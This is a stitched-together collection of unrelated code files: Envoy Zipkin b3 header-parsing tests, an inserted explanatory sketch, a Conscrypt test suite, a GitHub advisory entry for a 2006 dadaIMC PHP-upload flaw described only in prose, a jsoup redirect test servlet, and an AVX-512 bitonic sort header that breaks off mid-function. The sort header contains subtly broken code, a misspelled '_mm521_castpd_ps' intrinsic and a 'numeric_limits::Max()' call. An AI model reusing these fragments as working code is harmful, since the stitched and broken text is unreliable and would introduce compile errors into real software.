Http::TestRequestHeaderMapImpl request_headers{{"b3", "d"}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_FALSE(context.second); EXPECT_EQ(0, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(0, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, Sampled) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "1"}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_FALSE(context.second); EXPECT_EQ(0, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(0, 
context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, SampledFalse) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "0"}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_FALSE(context.second); EXPECT_EQ(0, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(0, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, IdNotYetSampled128) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}", trace_id_high, trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_TRUE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(9, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, IdsUnsampled) { Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}-{}-0", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, ParentUnsampled) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-0-{}", trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(2, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, ParentDebug) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-d-{}", trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(2, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, IdsWithDebug) { Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}-{}-d", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); 
  EXPECT_FALSE(context.first.is128BitTraceId());
  EXPECT_EQ(1, context.first.traceId());
  EXPECT_EQ(0, context.first.traceIdHigh());
  EXPECT_TRUE(context.first.sampled());
  EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false}));
}

TEST(ZipkinSpanContextExtractorTest, WithoutSampled) {
  Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}-{}", trace_id, span_id)}};
  SpanContextExtractor extractor(request_headers);
  auto context = extractor.extractSpanContext(false);
  EXPECT_TRUE(context.second);
  EXPECT_EQ(3, context.first.id());
  EXPECT_EQ(0, context.first.parentId());
  EXPECT_FALSE(context.first.is128BitTraceId());
  EXPECT_EQ(1, context.first.traceId());
  EXPECT_EQ(0, context.first.traceIdHigh());
  EXPECT_FALSE(context.first.sampled());
  EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true}));
}

TEST(ZipkinSpanContextExtractorTest, TooBig) {
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}{}{}-{}-{}", trace_id, trace_id, trace_id, span_id, trace_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: too long");
    EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, false}));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}{}-{}-1-{}a", trace_id_high, trace_id, span_id, parent_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: too long");
  }
}

TEST(ZipkinSpanContextExtractorTest, Empty) {
  Http::TestRequestHeaderMapImpl request_headers{{"b3", ""}};
  SpanContextExtractor extractor(request_headers);
  EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                            "Invalid input: empty");
}

TEST(ZipkinSpanContextExtractorTest, InvalidInput) {
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"X-B3-TraceId", trace_id_high + trace_id.substr(0, 15) + "!"}, {"X-B3-SpanId", span_id}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              fmt::format("Invalid traceid_high {} or tracid {}", trace_id_high,
                                          trace_id.substr(0, 15) + "!"));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}!{}-{}", trace_id.substr(0, 15), trace_id, span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(
        extractor.extractSpanContext(true), ExtractorException,
        fmt::format("Invalid input: invalid trace id high {}!", trace_id.substr(0, 15)));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}{}!-{}", trace_id, trace_id.substr(0, 15), span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(
        extractor.extractSpanContext(true), ExtractorException,
        fmt::format("Invalid input: invalid trace id {}!", trace_id.substr(0, 15)));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}!-{}", trace_id.substr(0, 15), span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(
        extractor.extractSpanContext(true), ExtractorException,
        fmt::format("Invalid input: invalid trace id {}!", trace_id.substr(0, 15)));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}!{}", trace_id, span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: not exists span id");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}!", trace_id, span_id.substr(0, 15))}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(
        extractor.extractSpanContext(true), ExtractorException,
        fmt::format("Invalid input: invalid span id {}!", span_id.substr(0, 15)));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}!0", trace_id, span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: not exists sampling field");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-c", trace_id, span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: invalid sampling flag c");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-d!{}", trace_id, span_id, parent_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-d-{}!", trace_id, span_id, parent_id.substr(0, 15))}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(
        extractor.extractSpanContext(true), ExtractorException,
        fmt::format("Invalid input: invalid parent id {}!", parent_id.substr(0, 15)));
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", "-"}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true}));
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: invalid sampling flag -");
  }
}

TEST(ZipkinSpanContextExtractorTest, Truncated) {
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", "-1"}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", "1-"}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", "1-"}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", trace_id.substr(0, 15)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", trace_id}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{{"b3", trace_id + "-"}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}", trace_id.substr(0, 15), span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}", trace_id, span_id.substr(0, 15))}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-", trace_id, span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-1-", trace_id, span_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-1-{}", trace_id, span_id, parent_id.substr(0, 15))}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
  {
    Http::TestRequestHeaderMapImpl request_headers{
        {"b3", fmt::format("{}-{}-{}{}", trace_id, span_id, trace_id, trace_id)}};
    SpanContextExtractor extractor(request_headers);
    EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException,
                              "Invalid input: truncated");
  }
}

} // namespace Zipkin
} // namespace Tracers
} // namespace Extensions
} // namespace Envoy
6,991
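The Envoy test file above exercises Zipkin's b3 single-header propagation, whose value has the shape {trace_id}-{span_id}[-{sampling}[-{parent_id}]] with a 16- or 32-character hex trace id; the "too long", "truncated", and "invalid ... id" cases all come from that layout. As a rough standalone illustration of the layout only — the struct and function names below are invented for this sketch and are not taken from the Envoy sources — a splitter might look like this:

// Illustrative sketch, not part of the Envoy test file above.
#include <cassert>
#include <optional>
#include <string>
#include <vector>

struct B3Parts {
  std::string trace_id;
  std::string span_id;
  std::string sampling;   // "0", "1", "d", or empty when absent
  std::string parent_id;  // empty when absent
};

std::optional<B3Parts> splitB3(const std::string& value) {
  // Split on '-' into at most four fields.
  std::vector<std::string> tokens;
  size_t start = 0;
  while (true) {
    size_t pos = value.find('-', start);
    tokens.push_back(value.substr(start, pos - start));
    if (pos == std::string::npos) {
      break;
    }
    start = pos + 1;
  }
  if (tokens.size() < 2 || tokens.size() > 4) {
    return std::nullopt;  // roughly the "truncated" / "too long" cases
  }
  if (tokens[0].size() != 16 && tokens[0].size() != 32) {
    return std::nullopt;  // trace id must be 64-bit or 128-bit hex
  }
  if (tokens[1].size() != 16) {
    return std::nullopt;  // span id must be 64-bit hex
  }
  B3Parts parts;
  parts.trace_id = tokens[0];
  parts.span_id = tokens[1];
  if (tokens.size() > 2) {
    parts.sampling = tokens[2];
  }
  if (tokens.size() > 3) {
    parts.parent_id = tokens[3];
  }
  return parts;
}

int main() {
  auto parts = splitB3("0000000000000001-0000000000000003-1");
  assert(parts && parts->trace_id.size() == 16 && parts->sampling == "1");
  assert(!splitB3("not-a-b3-header"));  // malformed inputs are rejected, as in the tests above
  return 0;
}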
1,085
package org.conscrypt;

import static org.conscrypt.TestUtils.installConscryptAsDefaultProvider;

import org.junit.BeforeClass;
import org.junit.runner.RunWith;
import org.junit.runners.Suite;

@RunWith(Suite.class)
@Suite.SuiteClasses({
        AddressUtilsTest.class,
        ApplicationProtocolSelectorAdapterTest.class,
        ClientSessionContextTest.class,
        ConscryptSocketTest.class,
        ConscryptTest.class,
        DuckTypedPSKKeyManagerTest.class,
        FileClientSessionCacheTest.class,
        NativeCryptoTest.class,
        NativeRefTest.class,
        NativeSslSessionTest.class,
        OpenSSLKeyTest.class,
        OpenSSLX509CertificateTest.class,
        PlatformTest.class,
        ServerSessionContextTest.class,
        SSLUtilsTest.class,
        TestSessionBuilderTest.class,
})
public class ConscryptOpenJdkSuite {

    @BeforeClass
    public static void setupStatic() {
        installConscryptAsDefaultProvider();
    }
}
279
892
<reponame>westonsteimel/advisory-database-github
{
  "schema_version": "1.2.0",
  "id": "GHSA-xfvx-2xc3-9vrp",
  "modified": "2022-05-01T07:38:50Z",
  "published": "2022-05-01T07:38:50Z",
  "aliases": [
    "CVE-2006-6511"
  ],
  "details": "dadaIMC .99.3 uses an insufficiently restrictive FilesMatch directive in the installed .htaccess file, which allows remote attackers to execute arbitrary PHP code by uploading files whose names contain (1) feature, (2) editor, (3) newswire, (4) otherpress, (5) admin, (6) pbook, (7) media, or (8) mod, which are processed as PHP file types (application/x-httpd-php).",
  "severity": [],
  "affected": [],
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6511"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30862"
    },
    {
      "type": "WEB",
      "url": "http://bugs.dadaimc.org/view.php?id=191"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/23305"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/4977"
    }
  ],
  "database_specific": {
    "cwe_ids": [],
    "severity": "MODERATE",
    "github_reviewed": false
  }
}
569
8,767
package org.jsoup.integration.servlets;

import org.jsoup.integration.TestServer;

import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class RedirectServlet extends BaseServlet {
    public static final String Url = TestServer.map(RedirectServlet.class);
    public static final String LocationParam = "loc";
    public static final String CodeParam = "code";
    public static final String SetCookiesParam = "setCookies";
    private static final int DefaultCode = HttpServletResponse.SC_MOVED_TEMPORARILY;

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse res) {
        String location = req.getParameter(LocationParam);
        if (location == null)
            location = "";

        int intCode = DefaultCode;
        String code = req.getParameter(CodeParam);
        if (code != null)
            intCode = Integer.parseInt(code);

        if (req.getParameter(SetCookiesParam) != null) {
            res.addCookie(new Cookie("token", "<PASSWORD>"));
            res.addCookie(new Cookie("uid", "jhy"));
        }

        res.setHeader("Location", location);
        res.setStatus(intCode);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse res) {
        doGet(req, res);
    }
}
513
9,402
<reponame>pyracanda/runtime // Licensed to the .NET Foundation under one or more agreements. // The .NET Foundation licenses this file to you under the MIT license. ///////////////////////////////////////////////////////////////////////////// //// // This file was auto-generated by a tool at 2020-07-21 14:05:39 // // It is recommended you DO NOT directly edit this file but instead edit // the code-generator that generated this source file instead. ///////////////////////////////////////////////////////////////////////////// #ifndef BITONIC_SORT_AVX512_INT32_T_H #define BITONIC_SORT_AVX512_INT32_T_H #ifdef __GNUC__ #ifdef __clang__ #pragma clang attribute push (__attribute__((target("avx512f"))), apply_to = any(function)) #else #pragma GCC push_options #pragma GCC target("avx512f") #endif #endif #include <immintrin.h> #include "bitonic_sort.h" #define i2d _mm512_castsi512_pd #define d2i _mm512_castpd_si512 #define i2s _mm512_castsi512_ps #define s2i _mm512_castps_si512 #define s2d _mm512_castps_pd #define d2s _mm521_castpd_ps namespace vxsort { namespace smallsort { template<> struct bitonic<int32_t, AVX512> { static const int N = 16; static constexpr int32_t MAX = std::numeric_limits<int32_t>::Max(); public: static INLINE void sort_01v_ascending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); s = _mm512_permutex_epi64(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xF0F0, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); s = _mm512_shuffle_i64x2(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xFF00, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xF0F0, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); } static INLINE void sort_01v_merge_ascending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_i64x2(d01, d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xFF00, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xF0F0, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); } static INLINE void sort_01v_descending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_ABCD); min = 
_mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); s = _mm512_permutex_epi64(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x0F0F, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); s = _mm512_shuffle_i64x2(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x00FF, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x0F0F, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); } static INLINE void sort_01v_merge_descending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_i64x2(d01, d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x00FF, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x0F0F, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); } static INLINE void sort_02v_ascending(__m512i& d01, __m512i& d02) { __m512i tmp; sort_01v_ascending(d01); sort_01v_descending(d02); tmp = d02; d02 = _mm512_max_epi32(d01, d02); d01 = _mm512_min_epi32(d01, tmp); sort_01v_merge_ascending(d01); sort_01v_merge_ascending(d02); } static INLINE void sort_02v_descending(__m512i& d01, __m512i& d02) { __m512i tmp; sort_01v_descending(d01); sort_01v_ascending(d02); tmp = d02; d02 = _mm512_max_epi32(d01, d02); d01 = _mm512_min_epi32(d01, tmp); sort_01v_merge_descending(d01); sort_01v_merge_descending(d02); } static INLINE void sort_02v_merge_ascending(__m512i& d01, __m512i& d02) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d02, d01); d02 = _mm512_max_epi32(d02, tmp); sort_01v_merge_ascending(d01); sort_01v_merge_ascending(d02); } static INLINE void sort_02v_merge_descending(__m512i& d01, __m512i& d02) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d02, d01); d02 = _mm512_max_epi32(d02, tmp); sort_01v_merge_descending(d01); sort_01v_merge_descending(d02); } static INLINE void sort_03v_ascending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; sort_02v_ascending(d01, d02); sort_01v_descending(d03); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); sort_02v_merge_ascending(d01, d02); sort_01v_merge_ascending(d03); } static INLINE void sort_03v_descending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; sort_02v_descending(d01, d02); sort_01v_ascending(d03); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); sort_02v_merge_descending(d01, d02); sort_01v_merge_descending(d03); } static INLINE void sort_03v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; tmp = d01; d01 = 
_mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); sort_02v_merge_ascending(d01, d02); sort_01v_merge_ascending(d03); } static INLINE void sort_03v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); sort_02v_merge_descending(d01, d02); sort_01v_merge_descending(d03); } static NOINLINE void sort_04v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; sort_02v_ascending(d01, d02); sort_02v_descending(d03, d04); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); tmp = d04; d04 = _mm512_max_epi32(d01, d04); d01 = _mm512_min_epi32(d01, tmp); sort_02v_merge_ascending(d01, d02); sort_02v_merge_ascending(d03, d04); } static NOINLINE void sort_04v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; sort_02v_descending(d01, d02); sort_02v_ascending(d03, d04); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); tmp = d04; d04 = _mm512_max_epi32(d01, d04); d01 = _mm512_min_epi32(d01, tmp); sort_02v_merge_descending(d01, d02); sort_02v_merge_descending(d03, d04); } static NOINLINE void sort_04v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); tmp = d02; d02 = _mm512_min_epi32(d04, d02); d04 = _mm512_max_epi32(d04, tmp); sort_02v_merge_ascending(d01, d02); sort_02v_merge_ascending(d03, d04); } static NOINLINE void sort_04v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); tmp = d02; d02 = _mm512_min_epi32(d04, d02); d04 = _mm512_max_epi32(d04, tmp); sort_02v_merge_descending(d01, d02); sort_02v_merge_descending(d03, d04); } static INLINE void sort_05v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_01v_descending(d05); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_01v_merge_ascending(d05); } static INLINE void sort_05v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_01v_ascending(d05); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_01v_merge_descending(d05); } static INLINE void sort_05v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_01v_merge_ascending(d05); } static INLINE void sort_05v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_01v_merge_descending(d05); } static INLINE void sort_06v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, 